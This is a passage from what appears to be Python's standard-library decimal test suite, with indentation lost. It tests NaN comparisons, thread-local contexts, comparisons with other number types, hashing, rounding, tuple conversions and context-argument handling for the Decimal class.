order_ops = operator.lt, operator.le, operator.gt, operator.ge
equality_ops = operator.eq, operator.ne
# results when InvalidOperation is not trapped
for x, y in qnan_pairs + snan_pairs:
for op in order_ops + equality_ops:
got = op(x, y)
expected = True if op is operator.ne else False
self.assertIs(expected, got,
"expected {0!r} for operator.{1}({2!r}, {3!r}); "
"got {4!r}".format(
expected, op.__name__, x, y, got))
# repeat the above, but this time trap the InvalidOperation
with localcontext() as ctx:
ctx.traps[InvalidOperation] = 1
for x, y in qnan_pairs:
for op in equality_ops:
got = op(x, y)
expected = True if op is operator.ne else False
self.assertIs(expected, got,
"expected {0!r} for "
"operator.{1}({2!r}, {3!r}); "
"got {4!r}".format(
expected, op.__name__, x, y, got))
for x, y in snan_pairs:
for op in equality_ops:
self.assertRaises(InvalidOperation, operator.eq, x, y)
self.assertRaises(InvalidOperation, operator.ne, x, y)
for x, y in qnan_pairs + snan_pairs:
for op in order_ops:
self.assertRaises(InvalidOperation, op, x, y)
def test_copy_sign(self):
Decimal = self.decimal.Decimal
d = Decimal(1).copy_sign(Decimal(-2))
self.assertEqual(Decimal(1).copy_sign(-2), d)
self.assertRaises(TypeError, Decimal(1).copy_sign, '-2')
class CArithmeticOperatorsTest(ArithmeticOperatorsTest):
decimal = C
class PyArithmeticOperatorsTest(ArithmeticOperatorsTest):
decimal = P
# The following are two functions used to test threading in the next class
def thfunc1(cls):
Decimal = cls.decimal.Decimal
InvalidOperation = cls.decimal.InvalidOperation
DivisionByZero = cls.decimal.DivisionByZero
Overflow = cls.decimal.Overflow
Underflow = cls.decimal.Underflow
Inexact = cls.decimal.Inexact
getcontext = cls.decimal.getcontext
localcontext = cls.decimal.localcontext
d1 = Decimal(1)
d3 = Decimal(3)
test1 = d1/d3
cls.finish1.set()
cls.synchro.wait()
test2 = d1/d3
with localcontext() as c2:
cls.assertTrue(c2.flags[Inexact])
cls.assertRaises(DivisionByZero, c2.divide, d1, 0)
cls.assertTrue(c2.flags[DivisionByZero])
with localcontext() as c3:
cls.assertTrue(c3.flags[Inexact])
cls.assertTrue(c3.flags[DivisionByZero])
cls.assertRaises(InvalidOperation, c3.compare, d1, Decimal('sNaN'))
cls.assertTrue(c3.flags[InvalidOperation])
del c3
cls.assertFalse(c2.flags[InvalidOperation])
del c2
cls.assertEqual(test1, Decimal('0.333333333333333333333333'))
cls.assertEqual(test2, Decimal('0.333333333333333333333333'))
c1 = getcontext()
cls.assertTrue(c1.flags[Inexact])
for sig in Overflow, Underflow, DivisionByZero, InvalidOperation:
cls.assertFalse(c1.flags[sig])
def thfunc2(cls):
Decimal = cls.decimal.Decimal
InvalidOperation = cls.decimal.InvalidOperation
DivisionByZero = cls.decimal.DivisionByZero
Overflow = cls.decimal.Overflow
Underflow = cls.decimal.Underflow
Inexact = cls.decimal.Inexact
getcontext = cls.decimal.getcontext
localcontext = cls.decimal.localcontext
d1 = Decimal(1)
d3 = Decimal(3)
test1 = d1/d3
thiscontext = getcontext()
thiscontext.prec = 18
test2 = d1/d3
with localcontext() as c2:
cls.assertTrue(c2.flags[Inexact])
cls.assertRaises(Overflow, c2.multiply, Decimal('1e425000000'), 999)
cls.assertTrue(c2.flags[Overflow])
with localcontext(thiscontext) as c3:
cls.assertTrue(c3.flags[Inexact])
cls.assertFalse(c3.flags[Overflow])
c3.traps[Underflow] = True
cls.assertRaises(Underflow, c3.divide, Decimal('1e-425000000'), 999)
cls.assertTrue(c3.flags[Underflow])
del c3
cls.assertFalse(c2.flags[Underflow])
cls.assertFalse(c2.traps[Underflow])
del c2
cls.synchro.set()
cls.finish2.set()
cls.assertEqual(test1, Decimal('0.333333333333333333333333'))
cls.assertEqual(test2, Decimal('0.333333333333333333'))
cls.assertFalse(thiscontext.traps[Underflow])
cls.assertTrue(thiscontext.flags[Inexact])
for sig in Overflow, Underflow, DivisionByZero, InvalidOperation:
cls.assertFalse(thiscontext.flags[sig])
class ThreadingTest(unittest.TestCase):
'''Unit tests for thread local contexts in Decimal.'''
# Take care executing this test from IDLE, there's an issue in threading
# that hangs IDLE and I couldn't find it
def test_threading(self):
DefaultContext = self.decimal.DefaultContext
if self.decimal == C and not self.decimal.HAVE_THREADS:
self.skipTest("compiled without threading")
# Test the "threading isolation" of a Context. Also test changing
# the DefaultContext, which acts as a template for the thread-local
# contexts.
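        # (Threads that have not installed a context of their own start from a
        # copy of DefaultContext, so the prec/Emax/Emin values assigned below
        # are what thfunc1 and thfunc2 observe via getcontext().)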
save_prec = DefaultContext.prec
save_emax = DefaultContext.Emax
save_emin = DefaultContext.Emin
DefaultContext.prec = 24
DefaultContext.Emax = 425000000
DefaultContext.Emin = -425000000
self.synchro = threading.Event()
self.finish1 = threading.Event()
self.finish2 = threading.Event()
th1 = threading.Thread(target=thfunc1, args=(self,))
th2 = threading.Thread(target=thfunc2, args=(self,))
th1.start()
th2.start()
self.finish1.wait()
self.finish2.wait()
for sig in Signals[self.decimal]:
self.assertFalse(DefaultContext.flags[sig])
th1.join()
th2.join()
DefaultContext.prec = save_prec
DefaultContext.Emax = save_emax
DefaultContext.Emin = save_emin
class CThreadingTest(ThreadingTest):
decimal = C
class PyThreadingTest(ThreadingTest):
decimal = P
class UsabilityTest(unittest.TestCase):
'''Unit tests for Usability cases of Decimal.'''
def test_comparison_operators(self):
Decimal = self.decimal.Decimal
da = Decimal('23.42')
db = Decimal('23.42')
dc = Decimal('45')
#two Decimals
self.assertGreater(dc, da)
self.assertGreaterEqual(dc, da)
self.assertLess(da, dc)
self.assertLessEqual(da, dc)
self.assertEqual(da, db)
self.assertNotEqual(da, dc)
self.assertLessEqual(da, db)
self.assertGreaterEqual(da, db)
#a Decimal and an int
self.assertGreater(dc, 23)
self.assertLess(23, dc)
self.assertEqual(dc, 45)
#a Decimal and uncomparable
self.assertNotEqual(da, 'ugly')
self.assertNotEqual(da, 32.7)
self.assertNotEqual(da, object())
self.assertNotEqual(da, object)
# sortable
a = list(map(Decimal, range(100)))
b = a[:]
random.shuffle(a)
a.sort()
self.assertEqual(a, b)
def test_decimal_float_comparison(self):
Decimal = self.decimal.Decimal
da = Decimal('0.25')
db = Decimal('3.0')
self.assertLess(da, 3.0)
self.assertLessEqual(da, 3.0)
self.assertGreater(db, 0.25)
self.assertGreaterEqual(db, 0.25)
self.assertNotEqual(da, 1.5)
self.assertEqual(da, 0.25)
self.assertGreater(3.0, da)
self.assertGreaterEqual(3.0, da)
self.assertLess(0.25, db)
self.assertLessEqual(0.25, db)
self.assertNotEqual(0.25, db)
self.assertEqual(3.0, db)
self.assertNotEqual(0.1, Decimal('0.1'))
def test_decimal_complex_comparison(self):
Decimal = self.decimal.Decimal
da = Decimal('0.25')
db = Decimal('3.0')
self.assertNotEqual(da, (1.5+0j))
self.assertNotEqual((1.5+0j), da)
self.assertEqual(da, (0.25+0j))
self.assertEqual((0.25+0j), da)
self.assertEqual((3.0+0j), db)
self.assertEqual(db, (3.0+0j))
self.assertNotEqual(db, (3.0+1j))
self.assertNotEqual((3.0+1j), db)
self.assertIs(db.__lt__(3.0+0j), NotImplemented)
self.assertIs(db.__le__(3.0+0j), NotImplemented)
self.assertIs(db.__gt__(3.0+0j), NotImplemented)
        self.assertIs(db.__ge__(3.0+0j), NotImplemented)
def test_decimal_fraction_comparison(self):
D = self.decimal.Decimal
F = fractions[self.decimal].Fraction
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
emax = C.MAX_EMAX if C else 999999999
emin = C.MIN_EMIN if C else -999999999
etiny = C.MIN_ETINY if C else -1999999997
c = Context(Emax=emax, Emin=emin)
with localcontext(c):
c.prec = emax
self.assertLess(D(0), F(1,9999999999999999999999999999999999999))
self.assertLess(F(-1,9999999999999999999999999999999999999), D(0))
self.assertLess(F(0,1), D("1e" + str(etiny)))
self.assertLess(D("-1e" + str(etiny)), F(0,1))
self.assertLess(F(0,9999999999999999999999999), D("1e" + str(etiny)))
self.assertLess(D("-1e" + str(etiny)), F(0,9999999999999999999999999))
self.assertEqual(D("0.1"), F(1,10))
self.assertEqual(F(1,10), D("0.1"))
c.prec = 300
self.assertNotEqual(D(1)/3, F(1,3))
self.assertNotEqual(F(1,3), D(1)/3)
self.assertLessEqual(F(120984237, 9999999999), D("9e" + str(emax)))
self.assertGreaterEqual(D("9e" + str(emax)), F(120984237, 9999999999))
self.assertGreater(D('inf'), F(99999999999,123))
self.assertGreater(D('inf'), F(-99999999999,123))
self.assertLess(D('-inf'), F(99999999999,123))
self.assertLess(D('-inf'), F(-99999999999,123))
self.assertRaises(InvalidOperation, D('nan').__gt__, F(-9,123))
self.assertIs(NotImplemented, F(-9,123).__lt__(D('nan')))
self.assertNotEqual(D('nan'), F(-9,123))
self.assertNotEqual(F(-9,123), D('nan'))
def test_copy_and_deepcopy_methods(self):
Decimal = self.decimal.Decimal
d = Decimal('43.24')
c = copy.copy(d)
self.assertEqual(id(c), id(d))
dc = copy.deepcopy(d)
self.assertEqual(id(dc), id(d))
def test_hash_method(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
def hashit(d):
a = hash(d)
b = d.__hash__()
self.assertEqual(a, b)
return a
#just that it's hashable
hashit(Decimal(23))
hashit(Decimal('Infinity'))
hashit(Decimal('-Infinity'))
hashit(Decimal('nan123'))
hashit(Decimal('-NaN'))
test_values = [Decimal(sign*(2**m + n))
for m in [0, 14, 15, 16, 17, 30, 31,
32, 33, 61, 62, 63, 64, 65, 66]
for n in range(-10, 10)
for sign in [-1, 1]]
test_values.extend([
Decimal("-1"), # ==> -2
Decimal("-0"), # zeros
Decimal("0.00"),
Decimal("-0.000"),
Decimal("0E10"),
Decimal("-0E12"),
Decimal("10.0"), # negative exponent
Decimal("-23.00000"),
Decimal("1230E100"), # positive exponent
Decimal("-4.5678E50"),
# a value for which hash(n) != hash(n % (2**64-1))
# in Python pre-2.6
Decimal(2**64 + 2**32 - 1),
# selection of values which fail with the old (before
# version 2.6) long.__hash__
Decimal("1.634E100"),
Decimal("90.697E100"),
Decimal("188.83E100"),
Decimal("1652.9E100"),
Decimal("56531E100"),
])
# check that hash(d) == hash(int(d)) for integral values
for value in test_values:
self.assertEqual(hashit(value), hash(int(value)))
        # check that the hashes of a Decimal and a float match when they
        # represent exactly the same values
test_strings = ['inf', '-Inf', '0.0', '-.0e1',
'34.0', '2.5', '112390.625', '-0.515625']
for s in test_strings:
f = float(s)
d = Decimal(s)
self.assertEqual(hashit(d), hash(f))
with localcontext() as c:
# check that the value of the hash doesn't depend on the
# current context (issue #1757)
x = Decimal("123456789.1")
c.prec = 6
h1 = hashit(x)
c.prec = 10
h2 = hashit(x)
c.prec = 16
h3 = hashit(x)
self.assertEqual(h1, h2)
self.assertEqual(h1, h3)
c.prec = 10000
x = 1100 ** 1248
self.assertEqual(hashit(Decimal(x)), hashit(x))
def test_hash_method_nan(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, hash, Decimal('sNaN'))
value = Decimal('NaN')
self.assertEqual(hash(value), object.__hash__(value))
class H:
def __hash__(self):
return 42
class D(Decimal, H):
pass
value = D('NaN')
self.assertEqual(hash(value), object.__hash__(value))
def test_min_and_max_methods(self):
Decimal = self.decimal.Decimal
d1 = Decimal('15.32')
d2 = Decimal('28.5')
l1 = 15
l2 = 28
#between Decimals
self.assertIs(min(d1,d2), d1)
self.assertIs(min(d2,d1), d1)
self.assertIs(max(d1,d2), d2)
self.assertIs(max(d2,d1), d2)
#between Decimal and int
self.assertIs(min(d1,l2), d1)
self.assertIs(min(l2,d1), d1)
self.assertIs(max(l1,d2), d2)
self.assertIs(max(d2,l1), d2)
def test_as_nonzero(self):
Decimal = self.decimal.Decimal
#as false
self.assertFalse(Decimal(0))
#as true
self.assertTrue(Decimal('0.372'))
def test_tostring_methods(self):
#Test str and repr methods.
Decimal = self.decimal.Decimal
d = Decimal('15.32')
self.assertEqual(str(d), '15.32') # str
self.assertEqual(repr(d), "Decimal('15.32')") # repr
def test_tonum_methods(self):
#Test float and int methods.
Decimal = self.decimal.Decimal
d1 = Decimal('66')
d2 = Decimal('15.32')
#int
self.assertEqual(int(d1), 66)
self.assertEqual(int(d2), 15)
#float
self.assertEqual(float(d1), 66)
self.assertEqual(float(d2), 15.32)
#floor
test_pairs = [
('123.00', 123),
('3.2', 3),
('3.54', 3),
('3.899', 3),
('-2.3', -3),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('89891211712379812736.1', 89891211712379812736),
]
for d, i in test_pairs:
self.assertEqual(math.floor(Decimal(d)), i)
self.assertRaises(ValueError, math.floor, Decimal('-NaN'))
self.assertRaises(ValueError, math.floor, Decimal('sNaN'))
self.assertRaises(ValueError, math.floor, Decimal('NaN123'))
self.assertRaises(OverflowError, math.floor, Decimal('Inf'))
self.assertRaises(OverflowError, math.floor, Decimal('-Inf'))
#ceiling
test_pairs = [
('123.00', 123),
('3.2', 4),
('3.54', 4),
('3.899', 4),
('-2.3', -2),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('89891211712379812736.1', 89891211712379812737),
]
for d, i in test_pairs:
self.assertEqual(math.ceil(Decimal(d)), i)
self.assertRaises(ValueError, math.ceil, Decimal('-NaN'))
self.assertRaises(ValueError, math.ceil, Decimal('sNaN'))
self.assertRaises(ValueError, math.ceil, Decimal('NaN123'))
self.assertRaises(OverflowError, math.ceil, Decimal('Inf'))
self.assertRaises(OverflowError, math.ceil, Decimal('-Inf'))
#round, single argument
test_pairs = [
('123.00', 123),
('3.2', 3),
('3.54', 4),
('3.899', 4),
('-2.3', -2),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('-3.5', -4),
('-2.5', -2),
('-1.5', -2),
('-0.5', 0),
('0.5', 0),
('1.5', 2),
('2.5', 2),
('3.5', 4),
]
for d, i in test_pairs:
self.assertEqual(round(Decimal(d)), i)
self.assertRaises(ValueError, round, Decimal('-NaN'))
self.assertRaises(ValueError, round, Decimal('sNaN'))
self.assertRaises(ValueError, round, Decimal('NaN123'))
self.assertRaises(OverflowError, round, Decimal('Inf'))
self.assertRaises(OverflowError, round, Decimal('-Inf'))
#round, two arguments; this is essentially equivalent
#to quantize, which is already extensively tested
test_triples = [
('123.456', -4, '0E+4'),
('123.456', -3, '0E+3'),
('123.456', -2, '1E+2'),
('123.456', -1, '1.2E+2'),
('123.456', 0, '123'),
('123.456', 1, '123.5'),
('123.456', 2, '123.46'),
('123.456', 3, '123.456'),
('123.456', 4, '123.4560'),
('123.455', 2, '123.46'),
('123.445', 2, '123.44'),
('Inf', 4, 'NaN'),
('-Inf', -23, 'NaN'),
('sNaN314', 3, 'NaN314'),
]
for d, n, r in test_triples:
self.assertEqual(str(round(Decimal(d), n)), r)
def test_nan_to_float(self):
# Test conversions of decimal NANs to float.
# See http://bugs.python.org/issue15544
Decimal = self.decimal.Decimal
for s in ('nan', 'nan1234', '-nan', '-nan2468'):
f = float(Decimal(s))
self.assertTrue(math.isnan(f))
sign = math.copysign(1.0, f)
self.assertEqual(sign, -1.0 if s.startswith('-') else 1.0)
def test_snan_to_float(self):
Decimal = self.decimal.Decimal
for s in ('snan', '-snan', 'snan1357', '-snan1234'):
d = Decimal(s)
self.assertRaises(ValueError, float, d)
def test_eval_round_trip(self):
Decimal = self.decimal.Decimal
#with zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(d, eval(repr(d)))
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(d, eval(repr(d)))
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(d, eval(repr(d)))
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(d, eval(repr(d)))
def test_as_tuple(self):
Decimal = self.decimal.Decimal
#with zero
d = Decimal(0)
self.assertEqual(d.as_tuple(), (0, (0,), 0) )
#int
d = Decimal(-45)
self.assertEqual(d.as_tuple(), (1, (4, 5), 0) )
#complicated string
d = Decimal("-4.34913534E-17")
self.assertEqual(d.as_tuple(), (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
# The '0' coefficient is implementation specific to decimal.py.
# It has no meaning in the C-version and is ignored there.
d = Decimal("Infinity")
self.assertEqual(d.as_tuple(), (0, (0,), 'F') )
#leading zeros in coefficient should be stripped
d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), -2) )
self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), -2) )
d = Decimal( (1, (0, 0, 0), 37) )
self.assertEqual(d.as_tuple(), (1, (0,), 37))
d = Decimal( (1, (), 37) )
self.assertEqual(d.as_tuple(), (1, (0,), 37))
#leading zeros in NaN diagnostic info should be stripped
d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), 'n') )
self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), 'n') )
d = Decimal( (1, (0, 0, 0), 'N') )
self.assertEqual(d.as_tuple(), (1, (), 'N') )
d = Decimal( (1, (), 'n') )
self.assertEqual(d.as_tuple(), (1, (), 'n') )
# For infinities, decimal.py has always silently accepted any
# coefficient tuple.
d = Decimal( (0, (0,), 'F') )
self.assertEqual(d.as_tuple(), (0, (0,), 'F'))
d = Decimal( (0, (4, 5, 3, 4), 'F') )
self.assertEqual(d.as_tuple(), (0, (0,), 'F'))
d = Decimal( (1, (0, 2, 7, 1), 'F') )
self.assertEqual(d.as_tuple(), (1, (0,), 'F'))
def test_as_integer_ratio(self):
Decimal = self.decimal.Decimal
# exceptional cases
self.assertRaises(OverflowError,
Decimal.as_integer_ratio, Decimal('inf'))
self.assertRaises(OverflowError,
Decimal.as_integer_ratio, Decimal('-inf'))
self.assertRaises(ValueError,
Decimal.as_integer_ratio, Decimal('-nan'))
self.assertRaises(ValueError,
Decimal.as_integer_ratio, Decimal('snan123'))
for exp in range(-4, 2):
for coeff in range(1000):
for sign in '+', '-':
d = Decimal('%s%dE%d' % (sign, coeff, exp))
pq = d.as_integer_ratio()
p, q = pq
# check return type
self.assertIsInstance(pq, tuple)
self.assertIsInstance(p, int)
self.assertIsInstance(q, int)
# check normalization: q should be positive;
# p should be relatively prime to q.
self.assertGreater(q, 0)
self.assertEqual(math.gcd(p, q), 1)
# check that p/q actually gives the correct value
self.assertEqual(Decimal(p) / Decimal(q), d)
def test_subclassing(self):
# Different behaviours when subclassing Decimal
Decimal = self.decimal.Decimal
class MyDecimal(Decimal):
y = None
d1 = MyDecimal(1)
d2 = MyDecimal(2)
d = d1 + d2
self.assertIs(type(d), Decimal)
d = d1.max(d2)
self.assertIs(type(d), Decimal)
d = copy.copy(d1)
self.assertIs(type(d), MyDecimal)
self.assertEqual(d, d1)
d = copy.deepcopy(d1)
self.assertIs(type(d), MyDecimal)
self.assertEqual(d, d1)
# Decimal(Decimal)
d = Decimal('1.0')
x = Decimal(d)
self.assertIs(type(x), Decimal)
self.assertEqual(x, d)
# MyDecimal(Decimal)
m = MyDecimal(d)
self.assertIs(type(m), MyDecimal)
self.assertEqual(m, d)
self.assertIs(m.y, None)
# Decimal(MyDecimal)
x = Decimal(m)
self.assertIs(type(x), Decimal)
self.assertEqual(x, d)
# MyDecimal(MyDecimal)
m.y = 9
x = MyDecimal(m)
self.assertIs(type(x), MyDecimal)
self.assertEqual(x, d)
self.assertIs(x.y, None)
def test_implicit_context(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
# Check results when context given implicitly. (Issue 2478)
c = getcontext()
self.assertEqual(str(Decimal(0).sqrt()),
str(c.sqrt(Decimal(0))))
def test_none_args(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
Underflow = self.decimal.Underflow
Subnormal = self.decimal.Subnormal
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
Clamped = self.decimal.Clamped
with localcontext(Context()) as c:
c.prec = 7
c.Emax = 999
c.Emin = -999
x = Decimal("111")
y = Decimal("1e9999")
z = Decimal("1e-9999")
##### Unary functions
c.clear_flags()
self.assertEqual(str(x.exp(context=None)), '1.609487E+48')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(Overflow, y.exp, context=None)
self.assertTrue(c.flags[Overflow])
self.assertIs(z.is_normal(context=None), False)
self.assertIs(z.is_subnormal(context=None), True)
c.clear_flags()
self.assertEqual(str(x.ln(context=None)), '4.709530')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal(-1).ln, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(x.log10(context=None)), '2.045323')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal(-1).log10, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(x.logb(context=None)), '2')
self.assertRaises(DivisionByZero, Decimal(0).logb, context=None)
self.assertTrue(c.flags[DivisionByZero])
c.clear_flags()
self.assertEqual(str(x.logical_invert(context=None)), '1111000')
self.assertRaises(InvalidOperation, y.logical_invert, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(y.next_minus(context=None)), '9.999999E+999')
self.assertRaises(InvalidOperation, Decimal('sNaN').next_minus, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(y.next_plus(context=None)), 'Infinity')
self.assertRaises(InvalidOperation, Decimal('sNaN').next_plus, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(z.normalize(context=None)), '0')
self.assertRaises(Overflow, y.normalize, context=None)
self.assertTrue(c.flags[Overflow])
self.assertEqual(str(z.number_class(context=None)), '+Subnormal')
c.clear_flags()
self.assertEqual(str(z.sqrt(context=None)), '0E-1005')
self.assertTrue(c.flags[Clamped])
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
self.assertTrue(c.flags[Subnormal])
self.assertTrue(c.flags[Underflow])
c.clear_flags()
self.assertRaises(Overflow, y.sqrt, context=None)
self.assertTrue(c.flags[Overflow])
c.capitals = 0
self.assertEqual(str(z.to_eng_string(context=None)), '1e-9999')
c.capitals = 1
##### Binary functions
c.clear_flags()
ans = str(x.compare(Decimal('Nan891287828'), context=None))
self.assertEqual(ans, 'NaN1287828')
self.assertRaises(InvalidOperation, x.compare, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.compare_signal(8224, context=None))
self.assertEqual(ans, '-1')
self.assertRaises(InvalidOperation, x.compare_signal, Decimal('NaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_and(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.logical_and, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_or(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.logical_or, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_xor(101, context=None))
self.assertEqual(ans, '10')
self.assertRaises(InvalidOperation, x.logical_xor, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.max(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.max, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.max_mag(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.max_mag, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.min(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.min, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.min_mag(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.min_mag, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.remainder_near(101, context=None))
self.assertEqual(ans, '10')
self.assertRaises(InvalidOperation, y.remainder_near, 101, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.rotate(2, context=None))
self.assertEqual(ans, '11100')
self.assertRaises(InvalidOperation, x.rotate, 101, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.scaleb(7, context=None))
self.assertEqual(ans, '1.11E+9')
self.assertRaises(InvalidOperation, x.scaleb, 10000, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.shift(2, context=None))
self.assertEqual(ans, '11100')
self.assertRaises(InvalidOperation, x.shift, 10000, context=None)
self.assertTrue(c.flags[InvalidOperation])
##### Ternary functions
c.clear_flags()
ans = str(x.fma(2, 3, context=None))
self.assertEqual(ans, '225')
self.assertRaises(Overflow, x.fma, Decimal('1e9999'), 3, context=None)
self.assertTrue(c.flags[Overflow])
##### Special cases
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral_value(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral_value(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral_value(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_value, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral_exact(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral_exact(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral_exact(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_exact, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_UP
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=None, context=None))
self.assertEqual(ans, '1.501')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=None, context=None))
self.assertEqual(ans, '1.500')
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=ROUND_UP, context=None))
self.assertEqual(ans, '1.501')
c.clear_flags()
self.assertRaises(InvalidOperation, y.quantize, Decimal('1e-10'), rounding=ROUND_UP, context=None)
self.assertTrue(c.flags[InvalidOperation])
with localcontext(Context()) as context:
context.prec = 7
context.Emax = 999
context.Emin = -999
with localcontext(ctx=None) as c:
self.assertEqual(c.prec, 7)
self.assertEqual(c.Emax, 999)
self.assertEqual(c.Emin, -999)
def test_conversions_from_int(self):
# Check that methods taking a second Decimal argument will
# always accept an integer in place of a Decimal.
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(4).compare(3),
Decimal(4).compare(Decimal(3)))
self.assertEqual(Decimal(4).compare_signal(3),
Decimal(4).compare_signal(Decimal(3)))
self.assertEqual(Decimal(4).compare_total(3),
Decimal(4).compare_total(Decimal(3)))
self.assertEqual(Decimal(4).compare_total_mag(3),
Decimal(4).compare_total_mag(Decimal(3)))
self.assertEqual(Decimal(10101).logical_and(1001),
Decimal(10101).logical_and(Decimal(1001)))
self.assertEqual(Decimal(10101).logical_or(1001),
Decimal(10101).logical_or(Decimal(1001)))
self.assertEqual(Decimal(10101).logical_xor(1001),
Decimal(10101).logical_xor(Decimal(1001)))
self.assertEqual(Decimal(567).max(123),
Decimal(567).max(Decimal(123)))
self.assertEqual(Decimal(567).max_mag(123),
Decimal(567).max_mag(Decimal(123)))
self.assertEqual(Decimal(567).min(123),
Decimal(567).min(Decimal(123)))
self.assertEqual(Decimal(567).min_mag(123),
Decimal(567).min_mag(Decimal(123)))
self.assertEqual(Decimal(567).next_toward(123),
Decimal(567).next_toward(Decimal(123)))
self.assertEqual(Decimal(1234).quantize(100),
Decimal(1234).quantize(Decimal(100)))
self.assertEqual(Decimal(768).remainder_near(1234),
Decimal(768).remainder_near(Decimal(1234)))
self.assertEqual(Decimal(123).rotate(1),
Decimal(123).rotate(Decimal(1)))
self.assertEqual(Decimal(1234).same_quantum(1000),
Decimal(1234).same_quantum(Decimal(1000)))
self.assertEqual(Decimal('9.123').scaleb(-100),
Decimal('9.123').scaleb(Decimal(-100)))
self.assertEqual(Decimal(456).shift(-1),
Decimal(456).shift(Decimal(-1)))
self.assertEqual(Decimal(-12).fma(Decimal(45), 67),
Decimal(-12).fma(Decimal(45), Decimal(67)))
self.assertEqual(Decimal(-12).fma(45, 67),
Decimal(-12).fma(Decimal(45), Decimal(67)))
self.assertEqual(Decimal(-12).fma(45, Decimal(67)),
Decimal(-12).fma(Decimal(45), Decimal(67)))
class CUsabilityTest(UsabilityTest):
decimal = C
class PyUsabilityTest(UsabilityTest):
decimal = P
class PythonAPItests(unittest.TestCase):
def test_abc(self):
Decimal = self.decimal.Decimal
